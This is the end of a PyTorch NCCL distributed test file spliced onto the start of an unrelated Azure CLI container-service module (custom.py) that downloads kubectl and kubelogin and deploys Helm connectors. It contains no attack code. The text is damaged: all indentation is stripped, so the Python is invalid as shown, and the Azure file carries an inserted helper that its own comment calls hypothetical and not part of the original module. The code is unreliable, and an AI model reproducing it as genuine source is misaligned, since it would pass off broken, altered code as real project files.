self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are identical to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group was constructed with a high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
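def _which_via_shutil(binary):
    # Hedged alternative (hypothetical helper, not part of the original module):
    # on Python 3, shutil.which performs an equivalent PATH lookup, including
    # executable-extension handling on Windows, so it could replace the manual
    # loop in which() above.
    return shutil.which(binary)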
def wait_then_open(url):
"""
Waits until a URL is reachable, then opens it. Useful for waiting for a proxy to come up before opening its URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
break
except URLError:
time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set, the path to an SSH key to use; only applies to DC/OS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
import zipfile
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
        raise CLIError("The current system '{}' is not supported.".format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None,
kubelogin_version='latest', kubelogin_install_location=None):
k8s_install_kubectl(cmd, client_version, install_location)
k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError("The current system '{}' is not supported.".format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows's search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
source_url = 'https://github.com/Azure/kubelogin/releases/download'
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
        raise CLIError("The current system '{}' is not supported.".format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"', download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows's search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
    # Validate the location against the available ACI regions
_validate_aci_location(norm_location)
    # Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
    # Get the credentials from an AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
